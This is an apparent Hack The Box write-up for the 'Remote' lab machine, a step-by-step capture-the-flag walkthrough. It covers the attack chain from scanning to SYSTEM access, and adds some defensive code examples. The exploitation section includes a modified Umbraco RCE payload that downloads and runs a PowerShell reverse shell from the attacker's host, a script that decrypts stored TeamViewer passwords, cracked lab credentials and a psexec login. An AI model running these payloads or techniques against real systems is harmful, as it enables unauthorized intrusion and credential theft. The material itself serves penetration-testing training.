HTB WriteUps

Remote

Last updated 2 years ago
Enumeration

As usual, we start with an nmap scan in order to find open ports on the target machine.

The following nmap command scans the target machine for open ports quickly and saves the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.180 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.92 scan initiated Thu Mar 17 20:30:07 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.31s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
49666/tcp open  unknown

# Nmap done at Thu Mar 17 20:30:34 2022 -- 1 IP address (1 host up) scanned in 26.91 seconds

As we can see, quite a few ports are open. Let's try to obtain more information about the services and versions running on those ports.

nmap -sC -sV -p21,80,111,135,445,2049,49666 10.10.10.180 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Mar 17 20:34:10 2022 as: nmap -sCV -p21,80,111,135,445,2049,49666 -Pn -oN targeted 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.046s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
49666/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-03-17T19:35:10
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 17 20:36:19 2022 -- 1 IP address (1 host up) scanned in 128.70 seconds
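Scans like the one above are usually read by eye, but the same report can be triaged programmatically. The following is an added example (not part of the writeup, not an nmap feature) that parses nmap's normal text output into a port table and flags the findings a defender would open a ticket for: anonymous FTP, SMB signing not enforced, and an exposed NFS service. SAMPLE_REPORT is the port table and host-script block from the targeted scan above, embedded so the code runs offline; the rule texts are mine.

```python
"""Triage an nmap -sCV text report: pull out the open ports with their
versions and flag the script findings a defender should act on. Added example,
not part of the writeup; SAMPLE_REPORT is the port table and host-script block
from the scan above, embedded so the code runs offline."""
import re

SAMPLE_REPORT = """\
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
49666/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""

# "21/tcp    open  ftp           Microsoft ftpd" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# NSE output worth a ticket, matched against the "|"-prefixed script lines.
NSE_RULES = [
    (re.compile(r"Anonymous FTP login allowed"),
     "anonymous FTP login enabled: review what the share exposes"),
    (re.compile(r"Message signing enabled but not required"),
     "SMB signing not required: enforce it via policy"),
]
# Services worth a look even when no script fired (service name -> finding).
SERVICE_RULES = {
    "nfs": "NFS exposed: check export ACLs (showmount -e)",
    "mountd": "NFS exposed: check export ACLs (showmount -e)",
}


def parse_ports(report):
    """Map each port number to its proto/state/service/version."""
    ports = {}
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports[int(port)] = {"proto": proto, "state": state,
                                "service": service, "version": version.strip()}
    return ports


def find_findings(report):
    """Return [(port or None, finding)] in report order; None = host level."""
    findings, current = [], None
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))   # script lines below belong to this port
            continue
        if line.startswith("Host script results"):
            current = None              # script lines below apply to the host
            continue
        if line.startswith("|"):
            for pattern, text in NSE_RULES:
                if pattern.search(line):
                    findings.append((current, text))
    for port, info in parse_ports(report).items():
        if info["service"] in SERVICE_RULES:
            findings.append((port, SERVICE_RULES[info["service"]]))
    return findings


if __name__ == "__main__":
    for port, info in sorted(parse_ports(SAMPLE_REPORT).items()):
        print(f"{port:>5}/{info['proto']} {info['service']:<14} {info['version']}")
    for port, text in find_findings(SAMPLE_REPORT):
        print(f"[{'host' if port is None else port}] {text}")
```

Run against the scan above it reports the three conditions the rest of this writeup goes on to use: anonymous FTP on 21, SMB signing not required at host level, and the NFS service on 2049.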

Let's take a look at the website.

Not much going on. Let's enumerate directories with gobuster.

gobuster dir -u http://10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of concurrent threads, in this case 200 threads.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.180
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404,500
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/18 15:30:01 Starting gobuster in directory enumeration mode
===============================================================
/blog                 (Status: 200) [Size: 5001]
/products             (Status: 200) [Size: 5328]
/contact              (Status: 200) [Size: 7880]
/home                 (Status: 200) [Size: 6703]
/people               (Status: 200) [Size: 6739]
/Home                 (Status: 200) [Size: 6703]
/Products             (Status: 200) [Size: 5338]
/Contact              (Status: 200) [Size: 7890]
/install              (Status: 302) [Size: 126] [--> /umbraco/]
/Blog                 (Status: 200) [Size: 5011]               
/about-us             (Status: 200) [Size: 5451]               
/People               (Status: 200) [Size: 6749]               
/INSTALL              (Status: 302) [Size: 126]

===============================================================
2022/03/18 15:33:47 Finished
===============================================================

If we take a look at the /install directory, which redirects to the /umbraco/ directory, we'll see a login page.

If we search for common Umbraco exploits with the searchsploit tool, we'll see that there is one which allows us to execute commands remotely, but we need valid credentials to use it.

searchsploit umbraco

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                                   | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                            | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                            | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal                                                                                               | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                            | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF                                                                                                      | aspx/webapps/50462.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

Nmap reported that port 2049 is open. This is the default port for NFS (Network File System). Let's see if any exports are available.

showmount -e 10.10.10.180

  • -e show the NFS server's export list.

Export list for 10.10.10.180:
/site_backups (everyone)

Let's create a directory in which we'll be mounting the NFS.

mkdir nfs

Now, let's mount the NFS into the previous folder.

mount -t nfs 10.10.10.180:/site_backups nfs/

  • -t the filesystem type, in this case nfs.

If we take a look at the nfs folder, we'll see a bunch of directories related to the web page.

ls -ll nfs/

total 115
drwx------ 2 nobody 4294967294    64 Feb 20  2020 App_Browsers
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Data
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Plugins
drwx------ 2 nobody 4294967294    64 Feb 20  2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20  2020 bin
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Config
drwx------ 2 nobody 4294967294    64 Feb 20  2020 css
-rwx------ 1 nobody 4294967294   152 Nov  1  2018 default.aspx
-rwx------ 1 nobody 4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Media
drwx------ 2 nobody 4294967294    64 Feb 20  2020 scripts
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Umbraco
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Umbraco_Client
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20  2020 Web.config

If we inspect the nfs/ folder, we'll end up finding the Umbraco.sdf file inside the App_Data folder.

ls -ll nfs/App_Data

total 1969
drwx------ 2 nobody 4294967294      64 Feb 20  2020 cache
drwx------ 2 nobody 4294967294    4096 Feb 20  2020 Logs
drwx------ 2 nobody 4294967294    4096 Feb 20  2020 Models
drwx------ 2 nobody 4294967294      64 Feb 20  2020 packages
drwx------ 2 nobody 4294967294    4096 Feb 20  2020 TEMP
-rwx------ 1 nobody 4294967294   36832 Feb 20  2020 umbraco.config
-rwx------ 1 nobody 4294967294 1965978 Feb 20  2020 Umbraco.sdf

We can see that it is a binary file.

cat nfs/App_Data/Umbraco.sdf

File: nfs/App_Data/Umbraco.sdf   <BINARY>

If we search for admin in the file with the strings tool, we'll find an email and a password hash.

strings nfs/App_Data/Umbraco.sdf | grep admin

[...]
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
[...]

Let's see if we can get the password for that hash with CrackStation (https://crackstation.net/).

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.
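Why does that lookup work at all? The record above stores a bare SHA-1 digest with no per-user salt, so one table computed once serves every site that hashes the same way. The following is an added example (my code, not the writeup's and not Umbraco's) that extracts the digest and algorithm marker from the `strings` line above, builds a miniature lookup table from a constructed word list, and contrasts it with a salted PBKDF2 hash that no precomputed table can cover. It assumes the digest is 40 hex characters immediately followed by the `{"hashAlgorithm":...}` marker, as shown on the page.

```python
"""Pull the digest out of the Umbraco.sdf `strings` record and show why an
unsalted SHA-1 hash is exactly what lookup tables such as CrackStation are
built for, while a salted, iterated hash is not. Added example, not code from
the writeup or from Umbraco; SAMPLE_RECORD is the grep line shown above."""
import hashlib
import hmac
import os
import re

# The SDF is binary, so `strings` prints the fields of the admin row glued
# together: user name "admin", e-mail "admin@htb.local", the digest, the
# algorithm JSON, the e-mail again, a locale and a GUID.
SAMPLE_RECORD = ("adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa"
                 '{"hashAlgorithm":"SHA1"}admin@htb.localen-US'
                 "feb1a998-d3bf-406a-b30b-e269d7abdf50")

# 40 hex chars immediately followed by the algorithm marker
RECORD_RE = re.compile(r'(?P<digest>[0-9a-fA-F]{40})\{"hashAlgorithm":"(?P<algo>[^"]+)"\}')


def parse_record(record):
    """Return (hex digest, algorithm name) or None if the pattern is absent."""
    m = RECORD_RE.search(record)
    return (m.group("digest").lower(), m.group("algo")) if m else None


def build_lookup(wordlist, algo="sha1"):
    """digest -> password for every candidate: a miniature CrackStation table.
    This precomputation only works because there is no per-user salt."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in wordlist}


def lookup(digest, table):
    """O(1) reversal of an unsalted digest, or None if it is not in the table."""
    return table.get(digest.lower())


def salted_hash(password, salt=None, iterations=100_000):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt: the defence the record
    above lacks. Returns (salt, digest); the salt is stored beside the digest."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def verify_salted(password, salt, digest, iterations=100_000):
    """Constant-time check of a candidate against a stored (salt, digest)."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    digest, algo = parse_record(SAMPLE_RECORD)
    print(f"algorithm={algo} digest={digest}")
    # Tiny constructed word list standing in for CrackStation's tables.
    table = build_lookup(["password", "123456", "baconandcheese"])
    print("lookup:", lookup(digest, table))
    salt, stored = salted_hash("baconandcheese")
    print("salted digest:", stored.hex(),
          "verify:", verify_salted("baconandcheese", salt, stored))
```

The salted variant yields a different digest for every user who picks the same password, which is what makes a shared precomputed table useless against it; the iteration count additionally makes each guess expensive.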

And we get the baconandcheese password. Now that we have valid credentials, we can use the exploit we found earlier with searchsploit.

searchsploit -m aspx/webapps/46153.py

  Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46153
     Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
File Type: Python script, ASCII text executable

Copied to: /home/alfa8sa/HTB/machines/remote/46153.py

Before executing it, we'll have to change a few things. First we'll have to change the login variable to admin@htb.local, the password variable to baconandcheese, and the host variable to http://10.10.10.180.

nano 46153.py

# Credentials recovered from Umbraco.sdf and the target URL
login = "admin@htb.local"
password = "baconandcheese"
host = "http://10.10.10.180"

Then we'll have to change the payload variable, so it will send us back a reverse shell. But first, we'll have to copy the Invoke-PowerShellTcp.ps1 file from Nishang to our current directory.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1

Then open it and append the following line at the end of the file.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 4444

Then start an HTTP server in the current directory with Python.

python -m http.server 80

Then, back in the Python script, we'll have to change the payload variable so that it downloads and imports the rev.ps1 file; when it is executed, it will send us the reverse shell.

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c powershell IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.19/rev.ps1\')"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

Finally, let's set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now, if we execute the Python script, we should get a reverse shell as the iis apppool\defaultapppool user, and we can grab the user flag.

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.180] 49703
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
iis apppool\defaultapppool
type \users\public\user.txt
6d0c411c9accbbe995751f83645e54d1

Privilege Escalation

If we list the processes running on the local machine, we'll see that TeamViewer is being executed.

tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0        140 K
Registry                        88                            0     20,108 K
smss.exe                       292                            0      1,244 K
csrss.exe                      372                            0      5,208 K
wininit.exe                    480                            0      6,856 K
csrss.exe                      496                            1      4,712 K
winlogon.exe                   544                            1     16,440 K
services.exe                   612                            0      7,880 K
lsass.exe                      632                            0     13,672 K
svchost.exe                    732                            0     13,660 K
fontdrvhost.exe                752                            0      3,908 K
fontdrvhost.exe                760                            1      4,200 K
svchost.exe                    844                            0      9,896 K
dwm.exe                        936                            1     37,272 K
svchost.exe                    972                            0     59,996 K
svchost.exe                    312                            0     15,084 K
svchost.exe                    316                            0     17,164 K
svchost.exe                    364                            0     16,912 K
svchost.exe                   1036                            0     19,164 K
svchost.exe                   1120                            0     22,272 K
vm3dservice.exe               1236                            0      6,548 K
svchost.exe                   1440                            0      8,696 K
svchost.exe                   1580                            0     16,796 K
spoolsv.exe                   1596                            0     16,248 K
svchost.exe                   1804                            0     10,652 K
svchost.exe                   2060                            0     26,804 K
svchost.exe                   2080                            0     11,784 K
inetinfo.exe                  2104                            0     15,192 K
svchost.exe                   2164                            0      8,288 K
TeamViewer_Service.exe        2228                            0     19,268 K
VGAuthService.exe             2256                            0     10,548 K
vmtoolsd.exe                  2280                            0     17,692 K
svchost.exe                   2296                            0      7,372 K
svchost.exe                   2312                            0     12,276 K
MsMpEng.exe                   2404                            0    170,252 K
nfssvc.exe                    2412                            0      5,264 K
svchost.exe                   2536                            0     12,124 K
dllhost.exe                   3132                            0     13,384 K
WmiPrvSE.exe                  3264                            0     18,532 K
LogonUI.exe                   3468                            1     45,868 K
msdtc.exe                     3536                            0     10,156 K
SearchIndexer.exe             4204                            0     18,212 K
svchost.exe                    776                            0     12,864 K
w3wp.exe                      1372                            0    298,748 K
svchost.exe                   4992                            0      6,204 K
cmd.exe                        472                            0      3,712 K
conhost.exe                   2132                            0     12,272 K
powershell.exe                4084                            0    126,344 K
tasklist.exe                  2684                            0      7,588 K

If we check on the C:\Program Files (x86)\TeamViewer directory, we'll see that it is using version 7.

dir \progra~2\TeamViewer

    Directory: C:\Program Files (x86)\TeamViewer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/27/2020  10:35 AM                Version7

There is a Metasploit module, written in Ruby, which can recover TeamViewer passwords. All we need is the stored (AES-encrypted) password, and we can find it in the HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7 registry key. This key has a SecurityPasswordAES property which contains the encrypted password.

(Get-ItemProperty HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7).SecurityPasswordAES

255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91

As I don't like to use Metasploit, I made a Python script which decrypts this value and gives us the password.

from Crypto.Cipher import AES  # pycryptodome

# Static key and IV hardcoded in TeamViewer 7: the SecurityPasswordAES value
# is the password encrypted with AES-128-CBC under them.
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"

decipher = AES.new(key, AES.MODE_CBC, iv)

# The 32 bytes returned by Get-ItemProperty above
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174, 19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218, 126, 141, 55, 107, 38, 57, 78, 91])

# The password is stored as UTF-16LE, zero padded to the block size
plaintext = decipher.decrypt(ciphertext).decode("utf-16-le").rstrip("\x00")

print(plaintext)

If we execute it, we'll get the !R3m0te! password.

python passwd.py

!R3m0te!

Now we can check with crackmapexec whether it is also the Administrator password.

crackmapexec smb 10.10.10.180 -u 'Administrator' -p "\!R3m0te\!"

SMB         10.10.10.180    445    REMOTE           [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB         10.10.10.180    445    REMOTE           [+] remote\Administrator:!R3m0te! (Pwn3d!)

The password is valid. Finally, let's get a shell as the nt authority\system user with psexec. Then, all we have to do is reap the harvest and take the root flag.

impacket-psexec Administrator:"\!R3m0te\!"@10.10.10.180

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file SliGWDPW.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service gnjn on 10.10.10.180.....
[*] Starting service gnjn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type \users\administrator\desktop\root.txt
f5f08ce4e749219167bb2e08abe2283b
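The psexec output above is also what this technique looks like from the defender's side: a randomly named executable uploaded to ADMIN$ (the Windows directory) and registered as a randomly named service, which Windows records as System event 7045 ("A service was installed in the system"). The following is an added detection example, my code rather than anything from the writeup or from Impacket, that applies two heuristics to such events: the service binary sits directly in the Windows root, and either the service name or the binary name looks randomly generated. The event lines and their pipe-separated layout are constructed for the example (not Windows' native format); the service and file names mirror the run above.

```python
"""Flag psexec-style service installs in Windows System log events (ID 7045,
"A service was installed in the system"). Added detection example, not part of
the writeup; SAMPLE_EVENTS is a constructed export in the form
timestamp|event_id|service_name|image_path, mirroring the psexec run above."""
import re

SAMPLE_EVENTS = """\
2022-03-18T16:02:11|7045|gnjn|%SystemRoot%\\SliGWDPW.exe
2022-03-18T16:05:40|7045|TeamViewer7|"C:\\Program Files (x86)\\TeamViewer\\Version7\\TeamViewer_Service.exe"
2022-03-18T16:07:02|7045|Spooler|%SystemRoot%\\System32\\spoolsv.exe
2022-03-18T16:09:15|7036|gnjn|
"""

# Impacket's psexec picks a short lowercase service name and an 8-letter
# executable name; the Sysinternals tool drops PSEXESVC.exe in the same place.
SERVICE_NAME_RE = re.compile(r"^[a-z]{4,8}$")
RANDOM_EXE_RE = re.compile(r"^[A-Za-z]{8}\.exe$")


def normalize_path(image_path):
    """Strip quoting and expand %SystemRoot% so paths compare consistently."""
    path = image_path.strip().strip('"')
    return re.sub(r"^%SystemRoot%", r"C:\\Windows", path, flags=re.IGNORECASE)


def is_suspicious(service_name, image_path):
    """True when the binary lives directly in the Windows root (ADMIN$) and
    either the service or the executable carries a random-looking name."""
    directory, _, exe = normalize_path(image_path).rpartition("\\")
    in_windows_root = directory.lower() == "c:\\windows"
    random_service = bool(SERVICE_NAME_RE.match(service_name))
    random_exe = bool(RANDOM_EXE_RE.match(exe))
    return in_windows_root and (random_service or random_exe)


def detect(events):
    """Return [(timestamp, service_name, image_path)] for suspicious 7045 events."""
    hits = []
    for line in events.splitlines():
        if not line.strip():
            continue
        timestamp, event_id, name, path = line.split("|", 3)
        if event_id != "7045":          # only service-installed events matter here
            continue
        if is_suspicious(name, path):
            hits.append((timestamp, name, path))
    return hits


if __name__ == "__main__":
    for timestamp, name, path in detect(SAMPLE_EVENTS):
        print(f"{timestamp} suspicious service install: {name} -> {path}")
```

Legitimate services almost never install straight into C:\Windows, so the location check keeps the name heuristics from firing on ordinary short service names; the pairing is what makes the rule useful on a real System log.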
